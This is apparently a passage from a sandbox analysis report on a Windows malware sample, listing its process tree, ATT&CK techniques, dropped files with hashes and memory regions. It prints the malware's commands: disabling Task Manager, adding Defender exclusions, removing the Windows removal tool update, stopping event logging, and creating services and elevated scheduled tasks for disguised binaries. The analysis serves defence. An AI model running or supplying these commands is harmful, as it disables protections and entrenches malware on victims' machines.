PID:3140

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
5⤵
- Modifies registry key
PID:412

C:\blockcontainerWincrtdll\Sessionperf.exe
"C:\blockcontainerWincrtdll/Sessionperf.exe"
5⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3892

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cavg5ra0\cavg5ra0.cmdline"
6⤵
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:2512

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5F18.tmp" "c:\Windows\System32\CSCD5CC967A790D48AD88533488B3BBE26.TMP"
7⤵
PID:3684

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\blockcontainerWincrtdll\sppsvc.exe'
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4380

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Google\Chrome\Application\fontdrvhost.exe'
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4228

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\dwm.exe'
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4068

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\Idle.exe'
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4084

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\SearchHost.exe'
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4048

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\NmFjvJVljH.bat"
6⤵
- Suspicious use of WriteProcessMemory
PID:2196

C:\Windows\system32\chcp.com
chcp 65001
7⤵
PID:4088

C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
7⤵
PID:2208

C:\Recovery\WindowsRE\SearchHost.exe
"C:\Recovery\WindowsRE\SearchHost.exe"
7⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2812

C:\Users\Admin\AppData\Local\Temp\Utility.exe
"C:\Users\Admin\AppData\Local\Temp\Utility.exe"
2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:3452

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1368

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
3⤵
- Suspicious use of WriteProcessMemory
PID:8

C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
4⤵
PID:4692

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:596

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1812

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4224

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3564

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "QHRAJGDI"
3⤵
- Launches sc.exe
PID:1904

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "QHRAJGDI" binpath= "C:\ProgramData\nalfdgwigwyg\lhhsgwktkatl.exe" start= "auto"
3⤵
- Launches sc.exe
PID:4620

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
3⤵
- Launches sc.exe
PID:692

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "QHRAJGDI"
3⤵
- Launches sc.exe
PID:4728

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 10 /tr "'C:\blockcontainerWincrtdll\sppsvc.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4496

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\blockcontainerWincrtdll\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4808

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 7 /tr "'C:\blockcontainerWincrtdll\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2276

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 9 /tr "'C:\Program Files\Google\Chrome\Application\fontdrvhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3652

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Program Files\Google\Chrome\Application\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1104

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 7 /tr "'C:\Program Files\Google\Chrome\Application\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2848

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\dwm.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3764

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1900

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5056

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 11 /tr "'C:\Users\Default User\Idle.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:8

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Users\Default User\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1812

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:416

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchHostS" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\SearchHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:904

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchHost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\SearchHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4720

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchHostS" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\SearchHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4724

C:\ProgramData\nalfdgwigwyg\lhhsgwktkatl.exe
C:\ProgramData\nalfdgwigwyg\lhhsgwktkatl.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1092

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2040

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
2⤵
- Suspicious use of WriteProcessMemory
PID:1716

C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
3⤵
PID:4048

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4412

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:396

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2756

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4992

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
2⤵
PID:3092

C:\Windows\system32\conhost.exe
conhost.exe
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1548

C:\Program Files\Google\Chrome\Application\fontdrvhost.exe
"C:\Program Files\Google\Chrome\Application\fontdrvhost.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1720

C:\blockcontainerWincrtdll\sppsvc.exe
C:\blockcontainerWincrtdll\sppsvc.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2804

C:\Recovery\WindowsRE\dwm.exe
C:\Recovery\WindowsRE\dwm.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2348

C:\Users\Default User\Idle.exe
"C:\Users\Default User\Idle.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3152

C:\Program Files\Google\Chrome\Application\fontdrvhost.exe
"C:\Program Files\Google\Chrome\Application\fontdrvhost.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:568

C:\Recovery\WindowsRE\SearchHost.exe
C:\Recovery\WindowsRE\SearchHost.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4896

C:\blockcontainerWincrtdll\sppsvc.exe
C:\blockcontainerWincrtdll\sppsvc.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1012

C:\Recovery\WindowsRE\dwm.exe
C:\Recovery\WindowsRE\dwm.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3264

C:\Program Files\Google\Chrome\Application\fontdrvhost.exe
"C:\Program Files\Google\Chrome\Application\fontdrvhost.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3096

C:\blockcontainerWincrtdll\sppsvc.exe
C:\blockcontainerWincrtdll\sppsvc.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2456

C:\Recovery\WindowsRE\dwm.exe
C:\Recovery\WindowsRE\dwm.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4520

C:\Users\Default User\Idle.exe
"C:\Users\Default User\Idle.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:948

C:\Program Files\Google\Chrome\Application\fontdrvhost.exe
"C:\Program Files\Google\Chrome\Application\fontdrvhost.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4760

C:\Recovery\WindowsRE\SearchHost.exe
C:\Recovery\WindowsRE\SearchHost.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1064

C:\blockcontainerWincrtdll\sppsvc.exe
C:\blockcontainerWincrtdll\sppsvc.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3852

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

System Information Discovery

T1082

Query Registry

T1012

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Service Stop

T1489

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Idle.exe.log
Filesize
847B

MD5
2940b232afa412901f8ae5651c790f93

SHA1
f79bd5d1433c803515e2d9a016396344187beea2

SHA256
16f4a7736a0c2aee54256d3d75ce4c0816fabf130b3b92340deca34c5f5fda43

SHA512
553d5491c9bc358c7ce8a95caa445e882ab4bf744a2f5be1b2131c20f27321f65121389fd076558ba415f322fdad6ed36a05902e5c55cbbeace371182890af27

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
2e8eb51096d6f6781456fef7df731d97

SHA1
ec2aaf851a618fb43c3d040a13a71997c25bda43

SHA256
96bfd9dd5883329927fe8c08b8956355a1a6ceb30ceeb5d4252b346df32bc864

SHA512
0a73dc9a49f92d9dd556c2ca2e36761890b3538f355ee1f013e7cf648d8c4d065f28046cd4a167db3dea304d1fbcbcea68d11ce6e12a3f20f8b6c018a60422d2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
aa4f31835d07347297d35862c9045f4a

SHA1
83e728008935d30f98e5480fba4fbccf10cefb05

SHA256
99c83bc5c531e49d4240700142f3425aba74e18ebcc23556be32238ffde9cce0

SHA512
ec3a4bee8335007b8753ae8ac42287f2b3bcbb258f7fc3fb15c9f8d3e611cb9bf6ae2d3034953286a34f753e9ec33f7495e064bab0e8c7fcedd75d6e5eb66629

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
e3840d9bcedfe7017e49ee5d05bd1c46

SHA1
272620fb2605bd196df471d62db4b2d280a363c6

SHA256
3ac83e70415b9701ee71a4560232d7998e00c3db020fde669eb01b8821d2746f

SHA512
76adc88ab3930acc6b8b7668e2de797b8c00edcfc41660ee4485259c72a8adf162db62c2621ead5a9950f12bfe8a76ccab79d02fda11860afb0e217812cac376

Download Submit
C:\Users\Admin\AppData\Local\Temp\Checker.exe
Filesize
3.9MB

MD5
1003b37d9d942d41a38a83670eaa285c

SHA1
a4ee7ef69fc681caf1116d59578667abb9080ad6

SHA256
d822b616ee7e10b00fead9be9eb0cf9780fdb0b3fec3001ff31c9ce0cb7255ae

SHA512
0c6f4e063cc22ee3c076c95bf5ea1cb593e5b6f40e4f2b8d3723a5c18c14eeecf568dad2a16599967c56588f4918cecd996e475fd20615b07c99de4800309f9a

Download Submit
C:\Users\Admin\AppData\Local\Temp\NmFjvJVljH.bat
Filesize
212B

MD5
2beec5ad24e90dd22bc98da01fa2fe49

SHA1
5e1a749730ab661b142d00191b52cd1e7293e89d

SHA256
7007aab3519930a82178a42d867e34dc6fb0b1e7d60f5fdd14836d0c494ed618

SHA512
dba6e5e5cc3291b9abc9f1829ba4a07e3223e8938f5164d5e2af3782831c33fc30a8f07e33a63d641e4c89647d2bd986f1f2cc5335b280b2a35157316da8b28b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES5F18.tmp
Filesize
1KB

MD5
b08cd188315056831f63924d52293357

SHA1
c4cad19d29f7290f69565f9f42e7eb2c1fc57b85

SHA256
960511dc4e585da3cc2594224dea7a0c97c25af275eef13b2acb225c1ecf3f90

SHA512
ccb868f2a666c19a8fbc8a7098aec5185e51f475415dfad1ba78552cd8e194e00fa3fb61b6ca12264738b6fcca990fff84c5aaab54dcf7ab48555d8ae44c6cdb

Download Submit
C:\Users\Admin\AppData\Local\Temp\Utility.exe
Filesize
5.0MB

MD5
b1ac2ea973651a70ea72597e13a10f0a

SHA1
07e7cdedc54067a46b1d42cdf8a2c9050c3d3419

SHA256
e2cb500c902da55ac07cbfbe30b8d1cef8781e55f0439ed601672636c3ab8c47

SHA512
02b0dbc8a31ca440027a6c07d618a92bb520567ccd338c28dfcb86faa5b56c866564cf1a05b1754dcfeb252d12d76da57fd2de87804454f0ef1097431764c1f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fweqgnbz.tb4.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\blockcontainerWincrtdll\SFUqxLlNpV20NJ9uCnUYCbrkrl1WOe98n.vbe
Filesize
228B

MD5
4f702b152f4098393712e3fe99b04fbd

SHA1
fec2f913e1fac5053127e175f1ba048c9d8dd25c

SHA256
f0e2bfb22d22aed8ac10eff5a010fad081a5798706b3a6fd7764798cab716eb2

SHA512
7c0844d6591b694d77ecf3d070eb3f70fd99427e41d62167aa58c98c1966a8065d90beb82ab0aa0a42bb80edb3c205dd07bb1d4fc03d989a0cb4df8993635fbf

Download Submit
C:\blockcontainerWincrtdll\Sessionperf.exe
Filesize
3.6MB

MD5
bf0f63bb48eb95aaec6fc6a001c974ce

SHA1
19baab2b0c129ecbd6a1aa21bada3e2e5cdd1136

SHA256
bbb080aed81b8f4d0f5d590c7cb0e56e68da5a27d32d964c32e50e1cb2015edc

SHA512
130f08a7c4901ef47e7d21effe83c19fa442f2ade97967c11e646f949a9e8c2c46e8272a31a5b75f6c279009530cd101a562f1ab31a28fe410273cd69bf6c28c

Download Submit
C:\blockcontainerWincrtdll\TudTneFnbF0PE5UTQ8BUoLqStO6.bat
Filesize
201B

MD5
159297f9e35114bf97d74622097780d8

SHA1
2aaaf993b9ecb9bae43ccd41585734512ff08355

SHA256
650c37c1afde471e40f77d7aec8603382214e9ec318b7f08ab7653f9c4e87f81

SHA512
a82faa2f64caf669d44eac03705e34bea213c9a74ed73950bd8d2158d1c256ca290b7ffece866c3a03c36a091be70d92157353782061e184e5d44ac937949f69

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\cavg5ra0\cavg5ra0.0.cs
Filesize
369B

MD5
aa143456ce0c100dbe52c6f26860bf6e

SHA1
a158af4607915edbe05c4ef2d4b8d889ee470bed

SHA256
ef2a71abf56daf6e1d5d25b7a731b217a161ecd415a82cdc2fcd2631aa75e01a

SHA512
c2c132d439bca422909d8e35cca66da2dbb8b9f4c9daf88837f7cf59dce9c19bbe08cbf5306862c77d7482a0ef1b753c271b802ff5ee0a46883817b518a0e4e6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\cavg5ra0\cavg5ra0.cmdline
Filesize
235B

MD5
a80f938991ff2427734a3e9f1a3ffc5a

SHA1
de671400ece423518c7f6a463cbbb79b72dc28f6

SHA256
40ed650d1bed8634e1f10783f273d9afcd04c488231d0be41e6b028e82e40df7

SHA512
51fd52227936e2a9be8f5b25462889448644b74f508100b08f8cc34337213e0d24f0158978f3753ecdd0b491362db7541ddd8928a8b3be96b58f6d6ffe7e8d0f

Download Submit
\??\c:\Windows\System32\CSCD5CC967A790D48AD88533488B3BBE26.TMP
Filesize
1KB

MD5
ea2f5a870429cbb69781d4e52b72ae9a

SHA1
db13a37a4edc79d97ffa246cf2772215a204bce9

SHA256
341d3939c2cfbd6d7b4687d412fe896e3c2590523d03119616cb068a0c85cb45

SHA512
f9f4e0170e33f075bdbd7ea5cfabff0109ea04b63121a50fa6226e68c8955f0e6828d8c46d3c02341dd68adde2028998a9fd0d25db560f956fa37d8dc73e94c4

Download Submit
memory/1368-210-0x000001D12E3D0000-0x000001D12E51F000-memory.dmp

Filesize
1.3MB

Download
memory/1548-261-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1548-262-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1548-258-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1548-255-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1548-257-0x0000015985C10000-0x0000015985C30000-memory.dmp

Filesize
128KB

Download
memory/1548-250-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1548-251-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1548-252-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1548-260-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1548-259-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1548-254-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1548-256-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1548-253-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1548-298-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/1548-299-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2040-231-0x00000198D4050000-0x00000198D4103000-memory.dmp

Filesize
716KB

Download
memory/2040-232-0x00000198D4020000-0x00000198D402A000-memory.dmp

Filesize
40KB

Download
memory/2040-230-0x00000198D4030000-0x00000198D404C000-memory.dmp

Filesize
112KB

Download
memory/2040-233-0x00000198D4230000-0x00000198D424C000-memory.dmp

Filesize
112KB

Download
memory/2040-234-0x00000198D4210000-0x00000198D421A000-memory.dmp

Filesize
40KB

Download
memory/2040-235-0x00000198D4270000-0x00000198D428A000-memory.dmp

Filesize
104KB

Download
memory/2040-236-0x00000198D4220000-0x00000198D4228000-memory.dmp

Filesize
32KB

Download
memory/2040-237-0x00000198D4250000-0x00000198D4256000-memory.dmp

Filesize
24KB

Download
memory/2040-238-0x00000198D4260000-0x00000198D426A000-memory.dmp

Filesize
40KB

Download
memory/2040-241-0x00000198D3B70000-0x00000198D3CBF000-memory.dmp

Filesize
1.3MB

Download
memory/2812-265-0x000000001CC10000-0x000000001CC7F000-memory.dmp

Filesize
444KB

Download
memory/2812-264-0x000000001CA70000-0x000000001CA79000-memory.dmp

Filesize
36KB

Download
memory/2812-263-0x000000001D3E0000-0x000000001D48F000-memory.dmp

Filesize
700KB

Download
memory/3092-244-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/3092-246-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/3092-249-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/3092-242-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/3092-243-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/3092-245-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/3892-51-0x0000000002720000-0x0000000002730000-memory.dmp

Filesize
64KB

Download
memory/3892-63-0x000000001BFE0000-0x000000001BFF6000-memory.dmp

Filesize
88KB

Download
memory/3892-86-0x000000001C360000-0x000000001C3AE000-memory.dmp

Filesize
312KB

Download
memory/3892-84-0x000000001C060000-0x000000001C06C000-memory.dmp

Filesize
48KB

Download
memory/3892-82-0x000000001C2F0000-0x000000001C308000-memory.dmp

Filesize
96KB

Download
memory/3892-80-0x000000001C050000-0x000000001C05E000-memory.dmp

Filesize
56KB

Download
memory/3892-78-0x000000001C040000-0x000000001C050000-memory.dmp

Filesize
64KB

Download
memory/3892-76-0x000000001C030000-0x000000001C03E000-memory.dmp

Filesize
56KB

Download
memory/3892-74-0x000000001C090000-0x000000001C0EA000-memory.dmp

Filesize
360KB

Download
memory/3892-72-0x000000001C020000-0x000000001C030000-memory.dmp

Filesize
64KB

Download
memory/3892-70-0x000000001BFB0000-0x000000001BFC0000-memory.dmp

Filesize
64KB

Download
memory/3892-68-0x000000001BFA0000-0x000000001BFAE000-memory.dmp

Filesize
56KB

Download
memory/3892-66-0x000000001C550000-0x000000001CA78000-memory.dmp

Filesize
5.2MB

Download
memory/3892-36-0x00000000001C0000-0x0000000000562000-memory.dmp

Filesize
3.6MB

Download
memory/3892-38-0x000000001B210000-0x000000001B236000-memory.dmp

Filesize
152KB

Download
memory/3892-40-0x0000000000E00000-0x0000000000E0E000-memory.dmp

Filesize
56KB

Download
memory/3892-42-0x000000001BEE0000-0x000000001BEFC000-memory.dmp

Filesize
112KB

Download
memory/3892-43-0x000000001BF50000-0x000000001BFA0000-memory.dmp

Filesize
320KB

Download
memory/3892-65-0x000000001C000000-0x000000001C012000-memory.dmp

Filesize
72KB

Download
memory/3892-45-0x0000000000E10000-0x0000000000E20000-memory.dmp

Filesize
64KB

Download
memory/3892-61-0x000000001BF40000-0x000000001BF50000-memory.dmp

Filesize
64KB

Download
memory/3892-59-0x000000001BF10000-0x000000001BF1C000-memory.dmp

Filesize
48KB

Download
memory/3892-57-0x000000001BFC0000-0x000000001BFD2000-memory.dmp

Filesize
72KB

Download
memory/3892-55-0x000000001BF00000-0x000000001BF0E000-memory.dmp

Filesize
56KB

Download
memory/3892-53-0x000000001B240000-0x000000001B24E000-memory.dmp

Filesize
56KB

Download
memory/3892-147-0x000000001CD80000-0x000000001CE2F000-memory.dmp

Filesize
700KB

Download
memory/3892-49-0x0000000000E20000-0x0000000000E30000-memory.dmp

Filesize
64KB

Download
memory/3892-47-0x000000001BF20000-0x000000001BF38000-memory.dmp

Filesize
96KB

Download
memory/4048-172-0x000001EFF3420000-0x000001EFF356F000-memory.dmp

Filesize
1.3MB

Download
memory/4068-169-0x0000022256C50000-0x0000022256D9F000-memory.dmp

Filesize
1.3MB

Download
memory/4084-163-0x000002876E290000-0x000002876E3DF000-memory.dmp

Filesize
1.3MB

Download
memory/4228-166-0x00000219F3930000-0x00000219F3A7F000-memory.dmp

Filesize
1.3MB

Download
memory/4380-162-0x000001A233090000-0x000001A2331DF000-memory.dmp

Filesize
1.3MB

Download
memory/4380-117-0x000001A21AE20000-0x000001A21AE42000-memory.dmp

Filesize
136KB

Download
memory/5004-0-0x00007FF815A93000-0x00007FF815A95000-memory.dmp

Filesize
8KB

Download
memory/5004-31-0x00007FF815A90000-0x00007FF816552000-memory.dmp

Filesize
10.8MB

Download
memory/5004-2-0x00007FF815A90000-0x00007FF816552000-memory.dmp

Filesize
10.8MB

Download
memory/5004-1-0x0000000000920000-0x000000000097E000-memory.dmp

Filesize
376KB

Download